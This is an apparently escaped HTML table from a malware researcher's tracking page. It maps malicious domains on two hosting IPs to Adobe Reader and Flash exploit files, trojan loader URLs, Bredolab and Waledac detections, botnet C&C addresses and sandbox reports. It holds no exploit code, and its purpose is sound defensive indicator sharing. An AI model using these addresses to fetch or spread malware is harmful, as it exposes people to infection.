On the next IP:&lt;br /&gt;&lt;br /&gt;94.247.3.151 [hs.3-152.zlkon.lv]&lt;br /&gt;&lt;br /&gt;&lt;table width="512" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojan"&gt;hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)&lt;/span&gt;&lt;/td&gt;  &lt;td width="276"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="86"&gt;hxxp://cheapslotplay.cn/in.cgi?income48&lt;/td&gt;  &lt;td&gt;Redirect to exploit&lt;br /&gt;hxxp://hyperliteautoservices.cn/index.php (dead)&lt;br /&gt;but the trojan is still available on&lt;br /&gt;hyperliteautoservices.cn/load.php &lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;hxxp://daddybigtop.cn&lt;a href="http://wepawet.iseclab.org/view.php?hash=ef3063188a85f075510764cdd4f37d9e&amp;amp;t=1239059094&amp;amp;type=js" target="_blank"&gt;&lt;br /&gt;  &lt;/a&gt;&lt;/td&gt;  &lt;td&gt;Load trojan on&lt;br /&gt;hxxp://freeonlinehostguide.com/load.php&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=ef3063188a85f075510764cdd4f37d9e&amp;amp;t=1239059094&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1552cc1212a74b88461563200051fe3b5" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;Detection: &lt;br /&gt;Trojan-Downloader.Win32.Bredolab!IK &lt;br /&gt;TR/Crypt.ZPACK.Gen &lt;br /&gt;Trojan-Downloader.Win32.Bredolab&lt;br /&gt;Trojan:Win32/Meredrop &lt;br /&gt;&lt;br /&gt;Using a stack overflow in adobe reader 8.1.2 &lt;br /&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992" target="_blank"&gt;CVE-2008-2992&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td height="26"&gt;hxxp://educationbigtop.cn&lt;/td&gt;  &lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4" target="_blank"&gt;VirusTotal Report&lt;/a&gt; (Brebolab)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojan"&gt;hxxp://freehostinternet.com&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Load trojan on&lt;br /&gt;hxxp://daddybigtop.cn/load.php&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=137aa20f0f4fcbc34e5ba23aedef48abb" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;Detection: &lt;br /&gt;Trojan-Downloader.Win32.Bredolab&lt;br /&gt; &lt;br /&gt; Connect to botnet: 213.155.6.33&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td width="230" height="206"&gt;&lt;span class="trojans_luckysploit"&gt;hxxp://freeonlinehostguide.com/&lt;br /&gt;index.php&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Load trojan on&lt;br /&gt;hxxp://zzz.free.hostindianet.com/load.php?id=4&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=5802a3beabd9368daf35ad1eb4a995b3&amp;amp;t=1238099033&amp;amp;type=js" target="_blank"&gt;Javascript Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=17a3cc78e642b0a742187d9341ae4bcec" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;Detection: &lt;br /&gt;TR/Crypt.XPACK.Gen&lt;br /&gt;Win32:Walpak&lt;br /&gt;Win32/Kryptik.LI&lt;br /&gt;Trojan.Waledac.Gen!Pac.8 &lt;br /&gt;&lt;br /&gt;It connect to a URL and drop the file &amp;quot;digiwet.dll&amp;quot;&lt;br /&gt;Botnets C&amp;amp;C: &lt;br /&gt;turokgame.cn [74.50.98.156]&lt;br /&gt;94.247.2.95 and 78.109.30.224&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td height="26"&gt;&lt;span class="trojan"&gt;hxxp://freewebhostguide.com&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://safeweb.norton.com/report/show?name=freewebhostguide.com" target="_blank"&gt;Symantec&lt;/a&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=44eb05a65e07e2b4a6a1b62fa7223e14&amp;amp;t=1239052811&amp;amp;type=js" target="_blank"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojan"&gt;hxxp://greatbethere.cn&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Load trojan on&lt;br /&gt;hxxp://greatbethere.cn/load.php?id=4&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/893c4ed46d09f4d1c43ae40fbdef2bf8"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=666f614786902fd2352c0039e9dd2d04&amp;amp;t=1238102754&amp;amp;type=js" target="_blank"&gt;Javascript Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e76a4475454c09940d2671f4c52d7293" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;Detection: &lt;br /&gt;TR/Crypt.XPACK.Gen&lt;br /&gt;Win32:Walpak&lt;br /&gt;Win32/Kryptik.LI&lt;br /&gt;Trojan.Waledac.Gen!Pac.8 &lt;br /&gt;&lt;br /&gt;Using a stack overflow in adobe reader 8.1.1 &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank"&gt;CVE-2007-5659&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;It connect to a URL and drop the file &amp;quot;digiwet.dll&amp;quot;&lt;br /&gt;Botnets C&amp;amp;C: &lt;br /&gt;213.155.6.32&lt;br /&gt;78.109.30.224&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="26"&gt;hxxp://hugetopnonfat.cn&lt;/td&gt;  &lt;td&gt;dead&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="83"&gt;&lt;span class="trojan"&gt;hxxp://mediahomenamemartvideo.cn/&lt;br /&gt;in.cgi?income&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Botnet C&amp;amp;C / redirect to exploit&lt;br /&gt;hxxp://hyperliteautoservices.cn/index.php (dead)&lt;br /&gt;but the trojan is still available on&lt;br /&gt;hyperliteautoservices.cn/load.php &lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=dbf20d61a135033ff904d1e4aa193469&amp;amp;t=1239238663&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="131"&gt;hxxp://hyperliteautoservices.cn&lt;/td&gt;  &lt;td&gt;Redirect to exploit&lt;br /&gt;hxxp://hyperliteautoservices.cn/index.php&lt;br /&gt;but the trojan is still available on&lt;br /&gt;hyperliteautoservices.cn/load.php &lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/8327265e423bd2c7e19456119d389691"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=e161c0d6038be58eb3b1e4922d78f71f&amp;amp;t=1239143673" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=18be328f7652759e471e87bf6afa41cf8" target="_blank"&gt;Anubis&lt;br /&gt;&lt;/a&gt; Flash exploit is also live:&lt;br /&gt;
&lt;br /&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=e161c0d6038be58eb3b1e4922d78f71f&amp;amp;t=1239143673" target="_blank"&gt;Flash Analysis&lt;/a&gt;&lt;br /&gt;Botnet C&amp;amp;C: 78.109.29.112 &lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td height="20"&gt;hxxp://lieliteautobody.cn (dead)&lt;/td&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="36"&gt;&lt;span class="trojans_luckysploit"&gt;hxxp://liteautofinestsite.cn/load.php&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Exploit not found but trojan still there&lt;br /&gt;&lt;span class="trojans_luckysploit"&gt;hxxp://liteautofinestsite.cn/load.php&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;&lt;td height="117"&gt;hxxp://liteautogreatest.cn&lt;/td&gt;&lt;td&gt;Exploits&lt;br /&gt;  hxxp://liteautogreatest.cn/cache/readme.pdf&lt;br /&gt;  hxxp://liteautogreatest.cn/cache/flash.swf &lt;br /&gt;  to load trojan on&lt;br /&gt;  hxxp://liteautogreatest.cn/load.php&lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=88dbec3ba9da0df0a5f94806ec303516&amp;amp;t=1239816944&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=19d052d8429d68d3409883523bde4b33d" target="_blank"&gt;Anubis&lt;br /&gt;  &lt;br /&gt;    &lt;/a&gt; Flash exploit is also live:&lt;br /&gt;    &lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=e161c0d6038be58eb3b1e4922d78f71f&amp;amp;t=1239143673" target="_blank"&gt;Flash Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/d53523199a75b38f03300473508594d8" target="_blank"&gt;VirusTotal&lt;/a&gt;&lt;br /&gt;    &lt;br /&gt;  Botnet C&amp;amp;C: 78.109.29.112&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;  &lt;td height="117"&gt;&lt;span class="trojans_luckysploit"&gt;hxxp://liteautorepair.cn&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Exploit to load trojan on &lt;br /&gt;zzzz.hostindianet.com/load.php?id=4&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/37d49709ee09ba69072ce158ec0a4ddb"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=f4bec9780ebb9269d46becfb0557e391&amp;amp;t=1238886038&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1fff28d7a01d6b344ed7184ef3ca0537f" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;Trojan-Downloader.Win32.Bredolab&lt;br /&gt;&lt;br /&gt;Botnet controller: 213.155.4.82 &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="119"&gt;hxxp://litedownloadfinest.cn&lt;/td&gt;  &lt;td&gt;Exploit to load trojan on &lt;br /&gt;zzzz.hostindianet.com/load.php?id=4&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/4b25552e0659179a22fec8cc6208ad57"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=233e11cebbf860a6b689cd27b0a0cd92&amp;amp;t=1239013312&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=158efd3418e4e7c8495803043e3960cb9&amp;amp;format=html" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;TrojanDownloader:Win32/Bredolab.B&lt;br /&gt;&lt;br /&gt;Previous botnet controller: 78.109.29.112&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td height="148"&gt;&lt;span class="trojans_luckysploit"&gt;hxxp://litehitscar.cn/index.php&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Exploit to load trojan on &lt;br /&gt;hyperliteautoservices.cn/load.php?id=4&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&amp;amp;t=1239205859&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;Trojan.Botnetlog.3&lt;br /&gt;&lt;br /&gt;Botnets: &lt;br /&gt;78.109.29.112 - 78.109.30.224&lt;br /&gt;74.54.77.82&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td height="37"&gt;&lt;span class="trojans_luckysploit"&gt;hxxp://lieliteautobody.cn/load.php&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;Exploit not found but trojan still there&lt;br /&gt;&lt;span class="trojans_luckysploit"&gt;lieliteautobody.cn/load.php&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td height="38"&gt;hxxp://liteautofinestsite.cn/load.php&lt;/td&gt;  &lt;td&gt;Exploit not found but trojan still there&lt;br /&gt;&lt;span class="trojans_luckysploit"&gt;liteautofinestsite.cn/load.php&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;&lt;td height="148"&gt;&lt;span class="trojans_luckysploit"&gt;hxxp://liteupyourride.cn/&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Exploits&lt;br /&gt;  hxxp://&lt;span class="trojans_luckysploit"&gt;liteupyourride.cn&lt;/span&gt;/cache/readme.pdf&lt;br /&gt;  hxxp://&lt;span class="trojans_luckysploit"&gt;liteupyourride.cn&lt;/span&gt;/cache/flash.swf &lt;br /&gt;  to load trojan on&lt;br /&gt;  hxxp://&lt;span class="trojans_luckysploit"&gt;litehitscar.cn&lt;/span&gt;/load.php&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1f36ed14afffc55d4718874ebbc2924cf&amp;amp;call=first" target="_blank"&gt;Anubis&lt;br /&gt;&lt;br /&gt;&lt;/a&gt; PDF exploit is also live:&lt;br /&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=4925255f3716377f7fcb7c9bfb038795&amp;amp;t=1240163655&amp;amp;type=js" target="_blank"&gt;PDF Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/46adc25de221146ea1a2458c97602518" target="_blank"&gt;VirusTotal&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Botnet C&amp;amp;C: 78.109.29.112&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;  &lt;td&gt;hxxp://yournonfatbest.cn&lt;/td&gt;  &lt;td&gt;Exploit to load trojan on &lt;br /&gt;farm-en-12san.hostindianet.com/load.php?id=4&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/cc3417a8cbf0389ad12163327c8732df"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=e89d7bf9986d2d0c646386ce37a66711&amp;amp;t=1238583254&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=15848c72b1c5577b4ed8e07e237c0788c" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;TrojanDownloader:Win32/Bredolab.G&lt;br /&gt;&lt;br /&gt;Botnets: &lt;br /&gt;213.155.4.82&lt;br /&gt;78.109.30.224&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;hxxp://lotbetsite.cn&lt;/td&gt;  &lt;td&gt;Exploit to load trojan on &lt;br /&gt;casinoslotbet.cn/load.php - &lt;a href="http://wepawet.iseclab.org/view.php?hash=1c3cfb439f08852425dbc8040ecb520a&amp;amp;t=1238733983&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e"&gt;VirusTotal&lt;/a&gt; -  &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=120feec140b719c44296a36691cde80bf&amp;amp;format=html" target="_blank"&gt;Anubis&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&amp;amp;t=1239208603&amp;amp;type=js" target="_blank"&gt;Flash Exploit Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;Trojan-Downloader.Win32.Bredolab&lt;br /&gt;&lt;br /&gt;Botnet: &lt;br /&gt;213.155.6.33&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;hxxp://hugetopnonfat.cn/in.cgi?id1000&lt;/td&gt;  &lt;td&gt;&lt;a href="http://jsunpack.jeek.org/dec/go?url=hugetopnonfat.cn_in.cgi_id1000" target="_blank"&gt;Javascript Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;hxxp://PremiumNonfat.cn/all/&lt;br /&gt;
&lt;/td&gt;  &lt;td&gt;dead&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;hr /&gt;&lt;br /&gt; 94.247.3.150 [hs.3-150.zlkon.lv]&lt;br /&gt;&lt;br /&gt;&lt;table width="544" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC"&gt;
  &lt;tr&gt;&lt;td height="37"&gt;hxxp://autobestwestern.cn/&lt;br /&gt;cache/readme.pdf&lt;/td&gt;&lt;td&gt;Exploit to load trojan on &lt;br /&gt;litehitscar.cn/load.php?id=5 - &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=8233c2b3088873d86d042ce79289e44d&amp;amp;t=1240167118&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1cc774803b2c2ab249d677b9f5a678ead" target="_blank"&gt;Anubis&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&amp;amp;t=1239208603&amp;amp;type=js" target="_blank"&gt;Flash Exploit Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;TrojanDownloader:Win32/Bredolab.Q&lt;br /&gt;&lt;br /&gt;Botnet: &lt;br /&gt;78.109.29.112&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://coolnameshop.cn/in.cgi?income&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;hxxp://cutlot.cn/in.cgi?income&lt;/td&gt;  &lt;td&gt;Botnet C&amp;amp;C / Exploits to &lt;br /&gt;    hxxp://    liteautogreatest.cn/index.php&lt;br /&gt;    &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=20142646ae8f7bfe737f067a3b9727b4&amp;amp;t=1240007105&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;    then load trojan located&lt;br /&gt;    hxxp://litehitscar.cn/load.php?id=5&lt;br /&gt;    &lt;a href="http://www.virustotal.com/analisis/ad5c23d5a7c497bb790eef37979113d5" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1d42a8cbbf551c5a4e9de58e48e6eb20f" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;    &lt;br /&gt;    Botnets: &lt;br /&gt;    78.109.29.112 - 78.109.30.224&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;&lt;br /&gt;    &lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="218"&gt;hxxp://dotcomnameshop.cn&lt;/td&gt;&lt;td width="320"&gt;Botnet C&amp;amp;C&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://lotante.cn&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / Exploits to litehitscar.cn/index.php&lt;br /&gt;  &lt;a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&amp;amp;t=1239205859&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;  then load trojan located&lt;br /&gt;  hyperliteautoservices.cn/load.php?id=4&lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;  Botnets: &lt;br /&gt;  78.109.29.112 - 78.109.30.224&lt;br /&gt;  74.54.77.82 &lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://lotbetworld.cn/in.cgi?income&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / Exploits to litehitscar.cn/index.php&lt;br /&gt;  [94.247.3.151] &lt;br /&gt;  &lt;a href="http://wepawet.iseclab.org/view.php?hash=b9af869590a473fc6ba9f5ca8d498872&amp;amp;t=1239080318&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;  then load trojan located&lt;br /&gt;  hyperliteautoservices.cn/load.php?id=4&lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;  Botnets: &lt;br /&gt;  78.109.29.112 - 78.109.30.224&lt;br /&gt;  74.54.77.82 &lt;br /&gt;  &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="101"&gt;hxxp://homenameregistration.cn&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / Exploits to 78.41.207.196/vertu/?t=5&lt;br /&gt;  &lt;a href="http://wepawet.iseclab.org/view.php?hash=98f5276a9ceaaceab5f02eaba5fb201f&amp;amp;t=1237346408&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;  then load trojan located&lt;br /&gt;  78.41.207.196&lt;br /&gt;  &lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=100c37951c22d9a6e2b22a10f802b65c&amp;amp;t=1236822958"&gt;Analysis&lt;/a&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://hugetopnonfat.cn&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://dotcomnameshop.cn/&lt;br /&gt;in.cgi?income&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / Redirect to exploits &lt;br /&gt;hxxp://litehitscar.cn/index.php&lt;br /&gt;  [94.247.3.151] &lt;br /&gt;  &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&amp;amp;t=1239059244&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&amp;amp;t=1239205859&amp;amp;type=js" target="_blank"&gt;Exploit analysis&lt;/a&gt;&lt;br /&gt;  then load trojan located&lt;br /&gt;hxxp://hyperliteautoservices.cn/load.php?id=4&lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;  Botnets: &lt;br /&gt;  78.109.29.112 - 78.109.30.224&lt;br /&gt;  74.54.77.82 &lt;br /&gt;  &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://japanhostnet.com/&lt;br /&gt;in.cgi?income&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / Redirect to exploits  litehitscar.cn/index.php&lt;br /&gt;  [94.247.3.151] &lt;br /&gt;  &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&amp;amp;t=1239059244&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&amp;amp;t=1239205859&amp;amp;type=js" target="_blank"&gt;Exploit analysis&lt;/a&gt;&lt;br /&gt;  then load trojan located&lt;br /&gt;  hyperliteautoservices.cn/load.php?id=4&lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;  Botnets: &lt;br /&gt;  78.109.29.112 - 78.109.30.224&lt;br /&gt;  74.54.77.82 &lt;br /&gt;  &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="40"&gt;hxxp://internetnamestore.cn/&lt;br /&gt;in.cgi?income18&lt;/td&gt;&lt;td&gt;hyperliteautoservices.cn/index.php [94.247.3.151] &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1fdf218137076cf6465f76e3f183c3174&amp;amp;format=html" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="40"&gt;hxxp://lotmachinesguide.cn/&lt;br /&gt;in.cgi?income&lt;/td&gt;&lt;td&gt;Redirects to exploits&lt;br /&gt;  hxxp://liteautogreatest.cn/cache/readme.pdf&lt;br /&gt;  hxxp://liteautogreatest.cn/cache/flash.swf &lt;br /&gt;  to load trojan on&lt;br /&gt;  hxxp://liteautogreatest.cn/load.php&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d"&gt;VirusTotal&lt;/a&gt; - &lt;a 